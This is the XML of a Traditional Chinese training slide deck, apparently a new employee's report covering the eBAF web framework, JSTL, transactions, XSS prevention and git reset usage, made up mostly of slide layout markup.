            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10417175" y="546707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61804" y="4470780"/>
            <a:ext cx="1952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68171" y="6397381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https://github.com/doggy8088/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="11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8" grpId="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="42" grpId="0" animBg="1"/>
      <p:bldP spid="43" grpId="0" animBg="1"/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306" y="7598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61419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70400" y="246561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84381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502052" y="2465849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3585369" y="2984854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6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5594350" y="2984854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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7608331" y="2984854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44590" y="1917459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47156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44338" y="1511505"/>
            <a:ext cx="161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384524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0" name="矩形 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2156181" y="1002404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549118" y="855301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sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="橢圓 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480469" y="5431537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489450" y="5431538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503431" y="5431537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521102" y="5431772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2" idx="6"/>
            <a:endCxn id="33" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604419" y="5950777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3" idx="6"/>
            <a:endCxn id="34" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5613400" y="5950777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>
          <a:xfrm>
            <a:off x="7627381" y="5950777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519830" y="4975323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20953" y="454443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43" name="矩形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2175231" y="3968327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68168" y="3821224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pic>
        <p:nvPicPr>
          <p:cNvPr id="4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89" y="2277011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3" y="2295752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弧形箭號 (左彎) 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10178612" y="2139670"/>
            <a:ext cx="1708588" cy="3594380"/>
          </a:xfrm>
          <a:prstGeom prst="curvedLeftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A7C34"/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10303196" y="3458167"/>
            <a:ext cx="1888804" cy="647302"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8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</a:rPr>
              <a:t>Git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reset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="32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414328" y="4237205"/>
            <a:ext cx="1267488" cy="913289"/>
            <a:chOff x="10414328" y="4237205"/>
            <a:chExt cx="1267488" cy="913289"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形圖說文字 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10414328" y="4237205"/>
              <a:ext cx="1267488" cy="913289"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FBD7D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520852" y="4265392"/>
              <a:ext cx="1026104" cy="885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Soft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Mixed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 smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="D13B3B"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Hard</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D13B3B"/>
                </a:solidFill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3" grpId="0" animBg="1"/>
      <p:bldP spid="44" grpId="0"/>
      <p:bldP spid="48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Reset-Soft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--soft HEAD~2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6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23" name="橢圓 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5016280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52479" y="1540469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93248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0537389" y="154068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insert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23" idx="6"/>
            <a:endCxn id="24" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6043565" y="2015051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6"/>
            <a:endCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7879764" y="2015051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5" idx="6"/>
            <a:endCxn id="26" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9720532" y="2015051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0648183" y="978104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489933" y="607064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78851" y="668417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978991" y="66841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4" name="矩形 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4737294" y="203102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19399" y="69631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3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24" y="136926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8854655" y="18261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765120" y="3639056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277757" y="4961977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780431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pic>
        <p:nvPicPr>
          <p:cNvPr id="3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5" y="1323861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8693248" y="103146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034427" y="636259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955880" y="1046682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4839084" y="670840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759284" y="6693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3421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710016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79288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961077" y="268047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30" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="54" grpId="0"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="52" grpId="0"/>
      <p:bldP spid="53" grpId="0" animBg="1"/>
      <p:bldP spid="56" grpId="0"/>
      <p:bldP spid="57" grpId="0"/>
      <p:bldP spid="57" grpId="1"/>
      <p:bldP spid="58" grpId="0"/>
      <p:bldP spid="58" grpId="1"/>
      <p:bldP spid="61" grpId="0"/>
      <p:bldP spid="62" grpId="0"/>
      <p:bldP spid="39" grpId="0"/>
      <p:bldP spid="39" grpId="1"/>
      <p:bldP spid="40" grpId="0"/>
      <p:bldP spid="4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Reset-Mixed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向右箭號 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3434828" y="3757509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304009" y="5054275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2891" y="490359"/>
            <a:ext cx="323101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加錯檔案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reset HEAD filename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rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> --cached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filename</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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 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12" name="橢圓 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004615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40814" y="153329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681583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0525724" y="1533507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12" idx="6"/>
            <a:endCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6031900" y="2007875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6"/>
            <a:endCxn id="14" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7868099" y="2007875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6"/>
            <a:endCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9708867" y="2007875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36518" y="970928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78268" y="59988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67186" y="661241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67326" y="6612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23" name="矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4725629" y="195926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207734" y="62455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25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096" y="1391724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24" y="135560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5022762" y="629083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44215" y="103950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49985" y="309794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2091" y="27050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91263" y="27081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954441" y="26978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979728" y="2680901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38199" y="2703070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12091" y="271016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29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="33" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="9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reflog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reset --hard HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>@{3}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4" y="2299018"/>
            <a:ext cx="5705430" cy="1583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15" y="230188"/>
            <a:ext cx="3740562" cy="15954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64" y="4355736"/>
            <a:ext cx="6812484" cy="7217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953" y="4355736"/>
            <a:ext cx="3191715" cy="6711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84721" y="3113588"/>
            <a:ext cx="3753498" cy="24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Reset-Hard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2471" y="1825625"/>
            <a:ext cx="1047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如果程式改內容到一半，不小心下了指令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 reset --hard HEAD</a:t>
            </a:r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，那我原本改的內容都就都不見了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嗎！？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:glow rad="177800">
                  <a:srgbClr val="FF0000">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:glow>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400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" y="2800822"/>
            <a:ext cx="11342340" cy="2602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9" y="2800822"/>
            <a:ext cx="11662121" cy="276870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程式邏輯、資料庫存取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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畫面呈現</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Controller: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控制流程、轉發請求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://coldbox.ortusbooks.com/content/full/images/mvc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471487"/>
            <a:ext cx="657225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097733" y="6144825"/>
            <a:ext cx="225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https://coldbox.ortusbooks.com/</a:t>
            </a:r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Thanks for your attention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Page: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只存在這個頁面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Request:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 存在一次傳遞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Session:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 使用者使用期間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儲存個人資料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Appliaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: web container(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ex.eBAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>啟動到結束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9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10052513" y="2746313"/>
            <a:ext cx="1557596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Module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0135120" y="403483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9241559" y="5609808"/>
            <a:ext cx="1325187" cy="1325187"/>
            <a:chOff x="9241559" y="5457479"/>
            <a:chExt cx="1325187" cy="1325187"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1026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51636" y="2899435"/>
            <a:ext cx="1000877" cy="5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2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10831311" y="3425247"/>
            <a:ext cx="0" cy="60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9411855" y="3103028"/>
            <a:ext cx="640658" cy="32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9628275" y="5323350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0181585" y="5298657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27082" y="3906628"/>
            <a:ext cx="608038" cy="29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9411855" y="4118605"/>
            <a:ext cx="722516" cy="37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6482" y="3931117"/>
            <a:ext cx="4581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{DEMOA0_0110=com.cathaybk.demo.a0.trx.DEMOA0_0110, DEMOA0_0100=com.cathaybk.demo.a0.trx.DEMOA0_0100, MEPST0_0200=com.cathaybk.meps.t0.trx.MEPST0_0200, XXT0_0300=com.cathaybk.xx.t0.trx.XXT0_0300, MEPST0_0300=com.cathaybk.meps.t0.trx.MEPST0_0300, XXT0_0200=com.cathaybk.xx.t0.trx.XXT0_0200, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>SysNews_BK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>com.cathaybk.common.trx.SysNews_BK</a:t>
            </a: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8656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545" y="2333801"/>
            <a:ext cx="1763910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Web.xml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66904" y="2867358"/>
            <a:ext cx="2566782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Log4jAwareDispatcher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500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0389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Log4jAwareDispatcher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834748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BeanProxy.init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(true)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4344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68233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BeanProxy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902592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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m_namingMappings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2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9807349" y="3303740"/>
            <a:ext cx="447832" cy="62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4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293474" y="2300214"/>
            <a:ext cx="2133600" cy="29045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4664083" y="3306659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燕尾形向右箭號 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6427074" y="3070557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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url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波浪 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4293474" y="4443844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0274" y="1346418"/>
            <a:ext cx="3154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/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>XXWeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>/servlet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1"/>
              <a:t>HttpDispatcher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4908"/>
            <a:ext cx="8358515" cy="300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單箭頭接點 14"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5143985" y="1715750"/>
            <a:ext cx="1793676" cy="24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38200" y="2844824"/>
            <a:ext cx="10178436" cy="714283"/>
            <a:chOff x="838200" y="2844824"/>
            <a:chExt cx="10178436" cy="7142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49" y="2844824"/>
              <a:ext cx="4286736" cy="354658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24544"/>
              <a:ext cx="10178436" cy="334563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</p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="直線單箭頭接點 20"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6937661" y="1715750"/>
            <a:ext cx="1516663" cy="153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74" y="432790"/>
            <a:ext cx="6599879" cy="58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04" y="3881158"/>
            <a:ext cx="6302657" cy="281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04" y="4226408"/>
            <a:ext cx="7683840" cy="91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4" y="5289835"/>
            <a:ext cx="7179234" cy="324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04" y="5831576"/>
            <a:ext cx="7635134" cy="480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328" y="5634391"/>
            <a:ext cx="3299370" cy="368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953" y="4797294"/>
            <a:ext cx="4186709" cy="636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953" y="3597156"/>
            <a:ext cx="8338873" cy="1080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4435" y="125591"/>
            <a:ext cx="2133600" cy="285959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595044" y="108708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燕尾形向右箭號 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358035" y="850979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url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波浪 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224435" y="2224266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32508" y="125591"/>
            <a:ext cx="2854778" cy="285959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9365463" y="935777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89948" y="3322890"/>
            <a:ext cx="7575119" cy="2798033"/>
            <a:chOff x="965027" y="2181777"/>
            <a:chExt cx="5274310" cy="1948180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="圖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027" y="2181777"/>
              <a:ext cx="5274310" cy="1948180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 flipH="1" flipV="1">
              <a:off x="4263242" y="2648197"/>
              <a:ext cx="23750" cy="118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4766875" y="6077868"/>
            <a:ext cx="5116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XXWeb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servlet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HttpDispatcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/XXT0_0200/prompt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35584" y="13906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Container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0500" y="1314450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doPost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8328" y="1410126"/>
            <a:ext cx="363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Log4jAwareDispatcher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75097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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>144: aload_1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89472" y="5136463"/>
            <a:ext cx="265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159599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super.doAction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026011" y="3139198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0500" y="3158268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doGet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04875" y="3212669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HttpDispatcher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0500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doTrx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>141: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>aconst_null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737" y="5173577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HtmlRequestHandler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159923" y="1313144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18779" y="1365056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159694" y="1309007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execute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118550" y="1360919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159694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61513" y="3174592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95" y="4379554"/>
            <a:ext cx="4104013" cy="895114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="直線單箭頭接點 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095500" y="2495550"/>
            <a:ext cx="0" cy="6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7" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095500" y="4339368"/>
            <a:ext cx="0" cy="7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3"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4000500" y="5672612"/>
            <a:ext cx="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13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6064599" y="4324955"/>
            <a:ext cx="15498" cy="7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0"/>
            <a:endCxn id="21" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6064599" y="2494244"/>
            <a:ext cx="324" cy="64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1" idx="3"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7969923" y="1899557"/>
            <a:ext cx="189771" cy="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  <a:endCxn id="25" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10064694" y="2490107"/>
            <a:ext cx="0" cy="65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212571" y="4804245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doQuery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4078</TotalTime>
  <Words>3149</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>648</Paragraphs>
  <Slides>42</Slides>
  <Notes>31</Notes>
  <HiddenSlides>1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9" baseType="lpstr">
      <vt:lpstr>Aharoni</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>inherit</vt:lpstr>
      <vt:lpstr>細明體</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>多面向</vt:lpstr>
      <vt:lpstr>新人期末報告</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>eBAF</vt:lpstr>
      <vt:lpstr>MVC</vt:lpstr>
      <vt:lpstr>eBAF架構</vt:lpstr>
      <vt:lpstr>Init Servlet</vt:lpstr>
      <vt:lpstr>Request</vt:lpstr>
      <vt:lpstr>Request</vt:lpstr>
      <vt:lpstr>後</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>JSTL&amp;EL</vt:lpstr>
      <vt:lpstr>JSP</vt:lpstr>
      <vt:lpstr>JSTL</vt:lpstr>
      <vt:lpstr>Exception</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Transaction</vt:lpstr>
      <vt:lpstr>交易管理</vt:lpstr>
      <vt:lpstr>交易控制</vt:lpstr>
      <vt:lpstr>交易四大原則</vt:lpstr>
      <vt:lpstr>交易控制-連線</vt:lpstr>
      <vt:lpstr>交易控制-連線</vt:lpstr>
      <vt:lpstr>隔離等級</vt:lpstr>
      <vt:lpstr>Dirty read</vt:lpstr>
      <vt:lpstr>Unrepeatable Read</vt:lpstr>
      <vt:lpstr>Phantom  Read</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>XSS-Types</vt:lpstr>
      <vt:lpstr>XSS-Preventive measures</vt:lpstr>
      <vt:lpstr>XSS-Preventive measures</vt:lpstr>
      <vt:lpstr>Git-reset</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Reset</vt:lpstr>
      <vt:lpstr>Reset-Soft</vt:lpstr>
      <vt:lpstr>Reset-Mixed</vt:lpstr>
      <vt:lpstr>Reset-Hard</vt:lpstr>
      <vt:lpstr>Reset-Hard</vt:lpstr>
      <vt:lpstr>Reset-Hard</vt:lpstr>
      <vt:lpstr>QA &amp; 心得</vt:lpstr>
      <vt:lpstr>Thanks for your attention</vt:lpstr>
      <vt:lpstr>QA &amp; 心得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Ray Sheng</cp:lastModifiedBy>
  <cp:revision>220</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-05T07:13:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-19T14:37:52Z</dcterms:modified>
</cp:coreProperties>
</file>